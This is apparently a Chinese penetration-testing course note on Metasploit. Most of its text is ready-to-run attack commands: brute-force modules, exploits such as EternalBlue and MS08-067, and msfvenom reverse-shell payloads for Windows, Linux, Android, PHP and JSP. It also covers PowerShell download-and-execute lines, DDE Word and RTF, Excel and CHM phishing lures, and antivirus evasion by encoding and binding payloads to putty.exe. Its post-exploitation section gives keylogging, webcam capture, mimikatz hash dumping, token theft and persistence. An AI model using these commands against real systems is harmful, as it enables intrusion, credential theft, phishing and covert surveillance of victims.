DAY11+12-MSF
● 前言
● 参考网站:渗透测试之Metasploit - FreeBuf网络安全行业门户
● 一.MSF 信息收集模块
● 1.专业术语
● 渗透攻击(exploit)
● 测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。
● 攻击载荷(payload)
● 攻击者在目标系统上执行的一段攻击代码,该代码具有返弹连接,创建用户,执行其他系统命令的功能
● shellcode
● 在目标机器上运行的一段机器指令,成功执行后会返回一个shell
● 模块(module)
● 是指Metasploit框架中所使用的一段软件代码组件。
● 监听器(listener)
● 监听器是metasploit中用来等待介入网络连接的组件。
● 2.启动msf命令控制接口
● 使用命令:
● msfconsole
● 3.查看所有参数和解释
● 使用命令:
● help
● 4.启动设置
● 启动服务
● service postgresql start
● service metasploit start
命令过时了
● 启动msf命令控制接口
● msfconsole
● 查看数据库连接状态
● db_status
● 创一个工作台
● workspace -a test
● 删除 -d 选项
● 进入工作台
● wordspace test
● 扫描主机
● db_nmap -sS 192.168.80.1
● 导出扫描结果
● db_export 1.xml
● db_import 1.xml
● 查看扫描结果
● hosts
● 5.信息搜集
● 1.whois查询
● msf> whois example.com
● msf> whois 192.168.1.100
● 2.在线收集服务器 IP信息工具
● http://searchdns.netcraft.com/
● 3.nslookup
● 查询DNS的记录
● 查看域名解析是否正常
● 在网络故障的时候用来诊断网络问题
● 4.nmap查询
● msf> db_nmap –sS –A 192.168.1.111
● msf> db_services
查看扫描结果
● 6.高级扫描方式
● 实操示例
● use auxiliary/scanner/ip/ipidseq
IPID序列扫描器,与 nmap的-sI -O选项类似
● show options
● set RHOSTS 192.168.1.0/24
● set RPORT 8080
● set THREADS 50
● run
● 7.端口扫描---portscan模块
● 实操示例
● search portscan
● use auxiliary/scanner/portscan/syn
● set rhosts 192.168.80.136
● set threads 50
● run
● 8.特定扫描---smb_version 模块
● 实操示例
● use auxiliary/scanner/smb/smb_version
● showoptions
● set RHOSTS192.168.80.136
● run
● db_hosts –caddress,os_flavor
● 9.找MSSQL主机
● 实操示例
● use auxiliary/scanner/mssql/mssql_ping
● show options
● set rhosts 192.168.80.0/24
● set threads 255
● run
● 10.SSH 服务器扫描
● 实操示例
● use auxiliary/scanner/ssh/ssh_version
● set rhosts 192.168.80.0/24
● set threads 255
● run
● 11.Telnet服务器扫描
● 实操示例
● use auxiliary/scanner/telnet/telnet_version
● set rhosts 192.168.80.0/24
● set threads 255
● run
● 12.FTP主机扫描
● 实操示例
● use auxiliary/scanner/ftp/ftp_version
● show options
● set rhosts 192.168.80.0/24
● set threads 255
● run
● 13.描 FTP 匿名登录
● 实操示例
● use auxiliary/scanner/ftp/anonymous
● set rhosts 192.168.80.0/24
● set threads 255
● run
● 14.扫描局域网内存活主机
● 实操示例
● use auxiliary/scanner/discovery/arp_sweep
● set rhosts 192.168.80.0/24
● set threads 255
● run
● 15.扫描网站目录
● 实操示例
● use auxiliary/scanner/http/dir_scanner
● set rhosts 192.168.80.136
● set threads 50
● run
● 16.搜索网站中的E-mail地址
● 实操示例
● use auxiliary/gather/search_email_collector
● set domain cracer.com
● run
● 17.嗅探抓包
● 示例实操
● use auxiliary/sniffer/psnuffle
● run
● 二.MSF 密码破解模块
● 1.ssh服务口令猜测
● use auxiliary/scanner/ssh/ssh_login
● set rhosts 192.168.80.134
● set USERNAME root
● set PASS_FILE/root/pass.txt
● set threads 50
● run
● 2.mysql口令攻击
● search mysql
● use auxiliary/scanner/mysql/mysql_login
● show options
● set rhosts 192.168.80.130
● set user_file/root/user.txt
● exploit
● 3.postgresql攻击
● search postgresql
● use auxiliary/scanner/postgres/postgres_login
● show options
● set rhosts 192.168.80.130
● set user_file/root/user.txt
● exploit
● 4.tomcat 攻击
● search tomcat
● use auxiliary/scanner/http/tomcat_mgr_login
● set RHOSTS 192.168.1.1
● set PASS_FILE/root/pass.txt
● set USER_FILE/root/user.txt
● exploit
● 5.telnet 攻击
● useauxiliary/scanner/telnet/telnet_login
● set rhosts 192.168.1.1
● exploit
● 6.samba攻击
● use auxiliary/scanner/smb/smb_login
● set RHOSTS 192.168.1.1 /192.168.1.0/24
● set THREADS 200
● exploit
● 三.MSF 漏洞利用模块
● 1.Metasploit 常用漏洞利用命令
● 用指定关键字搜索可利用漏洞
● search <name>
● 使用漏洞
● use <exploit name>
● 显示选项
● show options
● 设置选项
● set <OPTION NAME> <option>
● 显示装置
● show payloads
● 显示目标(os版本)
● show targets
● 设置目标版本
● set TARGET<target number>
● 开始漏洞攻击
● exploit
● 列出会话
● sessions -l
● 选择会话
● sessions -i <ID>
● 结束会话
● sessions -k <ID>
● 把会话放到后台
● <ctrl> z
● 结束会话
● <ctrl> c
● 显示辅助模块
● show auxiliary
● 使用辅助模块
● use <auxiliaryname>
● 设置选项
● set <OPTIONNAME> <option>
● 运行模块
● run
● 2.MS10_002
IE浏览器漏洞
● use windows/browser/ms10_002_aurora
● set payload windows/meterpreter/reverse_tcp
● show options
● set SRVPORT 80
● set URIPATH /
● set LHOST 192.168.2.128
● set LPORT 444
● exploit
● 3.MS10_018
IE浏览器漏洞--IE6和IE7
● 受影响的操作系统
● Microsoft Internet Explorer 7.0
● Microsoft Internet Explorer 6.0 SP1
● Microsoft Internet Explorer 6.0
● 参考网站:渗透测试(MS10-018漏洞利用)CSDN博客
● 1.使用Nmap进行扫描,查看目标主机是否含有我们想要利用的漏洞
● 全部扫描:
● nmap -P0 --script=smb-vuln-conficker 【IP】
● nmap -P0 --script=smb-vuln-* 【IP】
● 具体扫描:
● smb-vuln-ms10-018
● 2.进入MSF,查看MS10-018漏洞是否可用
● 进入MSF
● msfconsole
● 查找漏洞
● search ms10_018
● 3.利用漏洞进行监听
● use exploit/windows/browser/ms10_018_ie_behaviors
● set payload windows/meterpreter/reverse_tcp
● set SRVPORT 80
● set URIPATH /
● set LHOST 192.168.42.131
XP的IP
● set LPORT 880
● exploit
● 4.MS12-020
远程桌面协议RDP远程代码执行漏洞
● 参考网站:攻防实验二:ms12-020(死亡蓝屏)漏洞复现-CSDN博客
● 影响操作系统
● windows xp
● Windows Server 2003
● Windows Server 2008
● Windows 7
● 1.切换管理员账户
● sudo su
● 2.端口扫描
● nmap 192.168.1.128
查看是否开放3389端口
● 3.进入武器库
● msfconsole
● 4.加载 ms12-020 攻击模块
● search ms12-020
● use [option]
● set rhosts 192.168.1.128
● 5.攻击
● run
● 5.MS10-046
显示特制的快捷方式图标,则该漏洞可能允许远程执行代码
● 受影响的操作系统
● Microsoft Windows XP SP3
● Microsoft Windows XP SP2
● Microsoft Windows Vista SP2
● Microsoft Windows Vista SP1
● Microsoft Windows Server 2008 R2
● Microsoft Windows Server 2003 SP2
● Microsoft Windows 7
● 参考网站:漏洞复现---MS10-046漏洞_Hskb的博客-CSDN博客
● 1.确保能够ping通
● ping 192.168.254.255
● 2.进入MSF攻击框架
● msfconsole
● 3.搜索MS10-046漏洞
● search ms10_046
● 4.引用编号为【0】的漏洞
● use 0
● 5.查看漏洞可配置的内容
● show options
● 6.配置命令
● set srvhost KALI的IP地址
● set payload windows/meterpreter/reverse_tcp
配置攻击载荷
● set lhost KALI的IP地址
● 7.配置完成,运行
● run
● 8.将生成的[URL地址]到目标机的[浏览器]进行打开
● 9.点击快捷方式
● pALBrUuiu
● 10.成功获得一台机器的控制权
● sessions 1
● 6.MS08_067
Windows Server服务RPC请求缓冲区溢出漏洞
● 参考网站:ms08-067漏洞复现_ms08-067复现-CSDN博客
● 1.进入武器库
● msfconsole
● 2.搜索ms08-067相关的攻击模块
● search ms08-067
● 3.使用攻击模块
● use 0
● 4.查看适合哪些版本
● show targets
● 5.设置目标主机的类型设置
● set target [34]
● 6.查看需要配置的参数
● show options
● 7.设置目标主机的IP
● set rhosts 192.168.254.133
● 8.查看可以用的payload
● show payloads
● 9.设置攻击载荷
● set pyaload windows/meterpreter/reverse_tcp
● 10.配置监听地址
● set lhost 192.168.254.255
Kali的ip地址
● 11.开始渗透
● run /exploit
● 7.MS12-004
打开特制的媒体文件,这些漏洞可能允许远程执行代码
● search ms12-004
● show options
● use exploit/windows/browser/ms12_004_midi
● set PAYLOAD windows/meterpreter/reverse_tcp
● set LHOST 192.168.2.128
● show targets
● exploit
● 8.MS17-010
永恒之蓝---无需解释
● 参考网站:永恒之蓝漏洞复现(ms17-010)-CSDN博客
● 基础命令
● 实操示例
● 进入msf:
● msfconsole
● 使用ms17-010扫描模块
● use auxiliary/scanner/smb/smb_ms17_010
● 设置目标IP或网段
● set RHOSTS 192.168.254.133
● 执行扫描
● run
● 使用search查找相关漏洞
● search ms17_010
● 使用模块
● use exploit/windows/smb/ms17_010_eternalblue
● 查看可设置的选项
● show options
● 设置***目标ip
● set RHOSTS 192.168.254.133
● 执行攻击
● exploit / run
● 后渗透命令
● 实操示例
● 查看当前用户
● getuid
● 进入shell
● shell
● 解决shell乱码
● chcp 65001
● 退出shell
● exit
● 把会话放到后台
● background
● 查看所有会话
● sessions
● 进入某个会话
● sessions -i id号
● 删除会话
● sessions -k id号
● 通过Shell对靶机Win7进行控制
● 创建用户名密码 blue/blue
● net user blue blue /add
● 将用户blue添加入管理组
● net localgroup administrators blue /add
● 开启远程桌面功能
● REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
● Kali远程桌面连接Win7
● rdesktop 172.16.70.199:3389
● 9.Linux samba
远程代码执行漏洞
● 远程代码执行条件
● 1. 服务器打开了文件/打印机共享端口445,让其能够在公网上访问
● 2. 共享文件拥有写入权限
● 3. 恶意攻击者需猜解Samba服务端共享目录的物理路径
● 具体命令
● search samba
● use linux/samba/lsa_transnames_heap
● show payloads
● set payloadlinux/x86/shell_bind_tcp
● set LPORT 8080
● set RHOST 192.168.2.66
● exploit
● 四.MSF 各种PAYLOAD
● 1.msfvenom
● 1.简介
● msfpayload和msfencode的结合体
● 2.所有参数
● 参数详解
● 3.常用参数
● 查看攻击载荷支持什么平台,哪些选项
● msfvenom -p windows/meterpreter/reverse_tcp --list-options
● 查看所有payloads
● msfvenom --list payloads
● 查看所有编码器
● msfvenom --list encoders
● x86/shikata_ga_nai是免杀中使用频率最高的一个编码器
● 其他查看设置
● 参考网站:MSF攻击载荷的生成 - 换头怪 - 博客园 (cnblogs.com)
● msfvenom --list 命令
● nops 在payload上添加指定长度的nop指令
● platforms 指定payload的目标操作系统平台
● archs 指定payload的目标CPU架构
● encrypt 解密方式
● formats 指定输出格式
● 2.监听参数
防止假session
● 接收到seesion后继续监听端口,保持侦听
● set ExitOnSession false
防止session意外退出
● 默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
● set SessionCommunicationTimeout 0
● 默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0,可永久不会被关闭
● set SessionExpirationTimeout 0
● 3.handler后台持续监听
● 快捷的建立监听的方式
● handler -H 192.168.8.124 -P 1122 -p windows/x64/meterpreter/reverse_tcp
● -H 目标机IP
● -P 目标机端口
● -p 攻击载荷
● 后台持续监听
● exploit -j -z
● -j 为后台任务
● -z 为持续监听
● 查看和管理后台任务
● jobs
● 结束所有任务
● jobs -K
● 4.payload的可持续化
● 原理
● 一般来说使用msfvenom生成的payload会单独开启一个进程,这种进程很容易被发现和关闭
● 在后期想做持久化的时候只能再使用migrate进行。
● 命令
● msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe
生成的shell程序执行后会启动两个进程shell.exe和svchost.exe,关闭其中一个不会影响会话状态。
● 参数解释
● PrependMigrate=true PrependMigrateProc=svchost.exe
● 使这个程序默认会迁移到svchost.exe进程
● 自己测试的时候不建议到这个进程而是其他的持久进程
● -p 指定使用的攻击载荷模块
● -e 指定使用x86/shikata_ga_nai编码器,
● -f 选项告诉MSF编码器输出格式为exe,
● -o 选项指定输出的文件名为shell.exe,保存在根目录下。
● 5.各平台payload生成
● 1.Linux
● msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<YourPort to Connect On> -f elf > shell.elf
● msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -a x86 --platform Linux -f elf > shell.elf
● 2.Windows
● msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<YourPort to Connect On> -f exe > shell.exe
● msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe >shell.exe
● 3.Mac
● msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port toConnect On> -f macho > shell.macho
● 4.Android
● msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f raw >shell.apk
● msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 R > test.apk
● 6.生成脚本payload
● 1.Powershell
● msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
● 2.Netcat
● nc正向连接
● msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.8.124 LPORT=1122 -f exe> 1.exe
● nc反向连接
● msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe> 1.exe
● 3.PHP
● msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IPAddress> LPORT=<Your Port to Connect On> -f raw > shell.php
● cat shell.php |pbcopy && echo '<?php ' | tr -d '\n' > shell.php &&pbpaste >> shell.php
● 4.ASP
● msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<YourPort to Connect On> -f asp > shell.asp
● 5.JSP
● msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port toConnect On> -f raw > shell.jsp
● 6.WAR
● msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port toConnect On> -f war > shell.war
● 7.侦听Handlers
● use exploit/multi/handler
● set PAYLOAD <Payload name>
● set LHOST 192.168.8.124
● set LPORT 1122
● set ExitOnSession false
● exploit -j -z
● 五.攻击与免杀
● 1.Powershell 配合msf无文件攻击
● 实战示例
● kali运行
● 生成ps脚本
● msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.254.139 LPORT=1121 -f psh-reflection >x.ps1
● 进入武器库
● msfconsole
● 设置侦听
● use exploit/multi/handler
● 设置攻击载荷
● set payload windows/x64/meterpreter/reverse_tcp
● 设置LHOST和LPORT
● set lhost 192.168.254.139
● set lport 1121
● 开始侦听
● run
● 客户端运行
● powershell IEX(New-Object Net.WebClient).DownloadString('http://192.168.137.1/x.ps1')
● http://192.168.137.1/x.ps1 为x.ps1文件存在的位置
● 2.Powershell配合word伪装木马执行
● 实战示例
● 新建word设置域
● DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.254.255/x.ps1') "
● 目标机打开word, 就会建立连接。
● 前提是对方有word -_-
● 没有被杀掉,能够执行
● 3.msf使用宏钓鱼
● 1.下载镜像 文件
● git clone https://github.com/bhdresh/CVE-2017-8759.git
● 使用梯子秒下
● 2.生成一个rtf后缀的文件
● python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.211.1/logo.txt
● python3无法运行
● 3.生成一个exe后缀的执行文件
● msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.211.1 LPORT=1133 -f exe > /root/shell.exe
● 4.将rft文件和exe文件捆绑
● python cve-2017-8759_toolkit.py -M exp -e http://192.168.211.1/shell.exe -l shell.exe
● 5.设置监听
● msfconsole
● handler -H 192.168.211.1 -P 1133 -p windows/x64/meterpreter/reverse_tcp
● 6.钓鱼模式
● 将rtf文件放入靶机打开即可(实战即发送邮件给别人)
● 4.msf制作excel钓鱼
● 实战示例
● msfconsole
● show options
● use exploit/multi/script/web_delivery
● set payload windows/x64/meterpreter/reverse_tcp
● set LHOST 192.168.254.139
● set lport 1122
● show targets
● set target 2
● exploit
● 5.制作钓鱼
● 使用Out-Excel.ps1制作excel钓鱼文件:
● PS D:\temp> . .\Out-Excel.ps1
● PS D:\\temp> Out-Excel -PayloadURL http://192.168.0.199:8080/-OutputFile D:\\test.xls
● 制作chm钓鱼文件
● Out-CHM -PayloadURL http://192.168.3.143:8080/ -HHCPath"C:\\Program Files (x86)\\HTML Help Workshop"
● 制作快捷方式钓鱼文件
● PS D:\temp> . .\Out-Shortcut.ps1
● PS D:\\temp> Out-Shortcut -PayloadURL http://192.168.3.143:8080/ -HotKey 'F3' -Icon'notepad.exe'
● nishang插件
● 6.使用ngrock穿透内网
● 网址:Sunny-Ngrok国内内网映射服务器
● 1.开通一个免费的隧道
● 2.连接隧道
● ./sunny clientid 隧道id号
● 3.ping一下域名:域名有时候解析不到,直接用IP
● pingfree.idcfengye.com
● 4.配置exe执行命令文件
● msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=142.171.158.200 lport=10388 -f exe > 123.exe
● 5.设置侦听
● msfconsole
● handler -H 127.0.0.1 -P 10651 -p -p windows/x64/meterpreter/reverse_tcp
● 6.钓鱼模式
● 将执行文件放到靶机上面去
● 7.成功钓鱼
● 建立会话连接
● 鱼钓多了
● 靶机连接隧道,然后隧道连接kali
● 7.Evasion模块免杀
● 现在用处不大了,基本上已经废掉了
● 查看模块
● show evasion
● 使用use windows/windows_defender_exe进行生成payload
● msfconsole
● use windows/windows_defender_exe
● set filenamepayload.exe
● set payloadwindows/meterpreter/reverse_tcp
● set LHOST192.168.8.124
● set LPORT 1122
● run
● 设置侦听
● handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp
● 8.捆绑免杀
● 生成payload 捆绑putty.exe
● msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -x putty.exe -f exe -o payload3.exe
● 捆绑编码免杀
● msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe
● 多重编码免杀
● msfvenom -a x86 --platform windows -pwindows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.8.124 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai-b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -ecmd/powershell_base64 -i 10 -x putty.exe -k -f exe > shell.exe
● 验证静态免杀 bypass
● 9.shellter免杀
● shellcode代码注入工具
● https://www.shellterproject.com/download/
● 10.免杀msfpayload
● 生产py文件的payload
● msfVENOM -p windows/x64/meterpreter/reverse_tcp LPORT=10003 LHOST=119.28.66.234 -e x86/shikata_ga_nai -i 17 -f py -o /root/121.py
● 建立侦听
● handler -H 119.28.66.234 -P 10003 -p windows/meterpreter/reverse_tcp
● 将生成的py文件修改处理
● 六.MSF 后渗透模块
● 1.Meterpreter介绍
● 参考网站:Meterpreter命令详解 - 渗透测试中心 - 博客园 (cnblogs.com)
● 是Metasploit框架中的一个扩展模块
● 作为溢出成功以后的攻击载荷使用
● 使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接
● 2.基本命令
● 进程迁移
● run post/windows/manage/migrate
● 关闭杀软
● run killav
● 通过其 shell 来关闭防火墙
● netsh adcfirewall set allprofiles state off
● 查看目标机所有流量
● run packetrecorder-i 1
● 提取系统信息
● run scraper
● 查看进程
● ps
● 切换进程
● migrate 1774
● 截屏
● screenshot
● 获取系统运行的平台
● sysinfo
● 查看桌面
● run vnc
● 开启目标主机远程桌面
● run getgui -e
● 命令为显示远程主机的系统信息
● sysinfo
● 3.文件系统命令
● 查看文件内容,文件必须存在
● cat c:\boot.ini
● 删除指定的文件
● del c:\boot.ini
● 上传文件到目标机主上
● upload setup.exe C:\windows\system32\
● upload /root/Desktop/netcat.exe c:\
● 下载文件到本机上
● download nimeia.txt /root/Desktop/
● download C:\boot.ini /root/
● 编辑文件
● edit c:\boot.ini
● 打印工作目录
● getwd
● 更改本地目录
● cd
● 列出在当前目录中的文件列表
● ls
● 输出工作目录
● pwd
● 进入目录文件下
● cd c:\
● 删除文件
● rm file
● 在受害者系统上的创建目录
● mkdir dier
● 受害者系统上删除目录
● rmdir
● 列出目标主机的文件和文件夹信息
● dir
● 修改目标主机上的文件名
● mv
● search文件
● search -d d:\www -f web.config
● search -d c:\ -f *.doc
● 搜索文件
● search -f autoexec.bat
● search -f sea*.bat c:\xamp\
● 用户登录数
● enumdesktops
● 4.运行程序命令
● 使用格式
● execute -f <file> [Options]
● 执行cmd.exe命令并进行交互
● execute -f cmd.exe
● 执行file参数所指定的文件
● execute -H -m -d notepad.exe -f wce.exe -a "-o wce.txt"
● 常用参数
● -f 执行的程序文件
● -h 显示帮助信息
● -H 隐藏后台执行
● -i 跟进程进行交互
● -a 传递给命令的参数
● -m 从内存中执行
● -t 使用当前伪造的线程令牌运行进程
● -s 在给定会话中执行进程
● -d 在目标主机执行时显示的进程名称(用以伪装)
● -o wce.txt是wce.exe的运行参数
● 5.摄像头命令
● 音频录制
● record_mic
● 查看摄像头接口
● webcam_chat
● 查看摄像头列表
● webcam_list
● 摄像头视频获取
● webcam_stream
● 6.端口转发命令
● portfwd -h
● 使用格式
● portfwd [-h] [add | delete | list | flush] [args]
● 端口转发,本机监听4444,把目标机3389转到本机4444
● portfwd add -l 4444 -p 3389 -r 192.168.1.102
● 使用rdesktop来连接桌面
● rdesktop -u Administrator -p bk#123 127.0.0.1:4444
● -u 用户名
● -p 密码
● 需要输入用户名和密码远程连接
● rdesktop 127.1.1.0:4444
● 选项:
● -L <opt> 要监听的本地主机(可选)
● -h 帮助横幅
● -l <opt> 要监听的本地端口
● -p <opt> 连接到的远程端口
● -r <opt> 要连接到的远程主机
● 7.shell网络环境命令
● meterpreter>run get_local_subnets
● 添加一条通向目标服务器内网的路由
● meterpreter>run autoroute -s 100.0.0.0/8 #(根据目标内网网络而定)
● 查看路由设置:
● meterpreter>run autoroute –p
● 一般来说,在meterpreter中设置路由便可以达到通往其内网的目的。然而有些时候还是会失败
● 这时我们可以background返回msf>,查看下外面的路由情况
● route print
● 如果发现没有路由信息,说明meterpreter shell设置的路由并没有生效,我们可以在msf中添加路由。
● msf>route add 10.0.0.0 255.0.0.0 1
● 说明:1表示session 1,攻击机如果要去访问100.0.0.0/8网段的资源,其下一跳是session1
● 至于什么是下一条这里不多说了,反正就是目前攻击机可以访问内网资源了。
● 8.键盘记录命令
● 开启键盘记录功能
● keyscan_start
● 显示捕捉到的键盘记录信息
● keyscan_dump
● 停止键盘记录
● keyscan_stop
● 在远程目标主机上添加一个用户
● add_user username password -h ip
● 将用户添加到目标主机的域管理员组中
● add_group_user "Domain Admins" username -h ip
● 9.Hash获取命令
● 加载mimikatz
● load mimikatz
● 获取hash值
● msv
● 获取明文
● kerberos
● 获取明文信息
● ssp
● 获取系统账户信息
● wdigest
● 必须要以错误的模块来让正确的模块显示
● mimikatz_command -f a::
● 获取目标 hash
● mimikatz_command -f hash::
● mimikatz_command -f samdump::hashes
● mimikatz_command -f sekurlsa::searchPa
● run post/windows/gather/smart_hashdump
● 10.抓包嗅探命令
● 1.加载嗅探模块
● use sniffer
● 2.列出目标主机所有开放的网络接口
● sniffer_interfaces
● 3.获取正在实施嗅探网络接口的统计数据
● sniffer_start 2
● 4.在目标主机上针对特定范围的数据包缓冲区启动嗅探
● sniffer_dump 2 /tmp/test2.cap
● 5.停止嗅探
● sniffer_stop 2
● 6.对抓取的包进行解包:
● use auxiliary/sniffer/psnuffle
● set pcapfile 1.cap
● run
● wireshark加载这个 /tmp/xpsp 1.cap 也可
● 11.盗取令牌命令
● 加载incoginto功能
● 用来盗窃目标主机的令牌或是假冒用户
● meterpreter> use incognito
● 列出目标主机用户的可用令牌
● meterpreter> list_tokens -u
● 列出目标主机用户组的可用令牌
● meterpreter> list_tokens -g
● 假冒目标主机上的可用令牌
● meterpreter> impersonate_token QLWEB\\Administrato
● meterpreter> impersonate_token DOMAIN_NAME\\USERNAME
● 12.持久控制服务器
● 前提条件:服务器系统可以安装后门
● run metsvc
● 命令
● msfconsole
● use exploit/multi/handler
● set payload windows/metsvc_bind_tcp
● set LPORT 31337
● set RHOST 192.168.2.131
● run
● 其他方法
● 注册表
● 服务后门
● 计划任务
● cs
● rookit
暂无评论
发表评论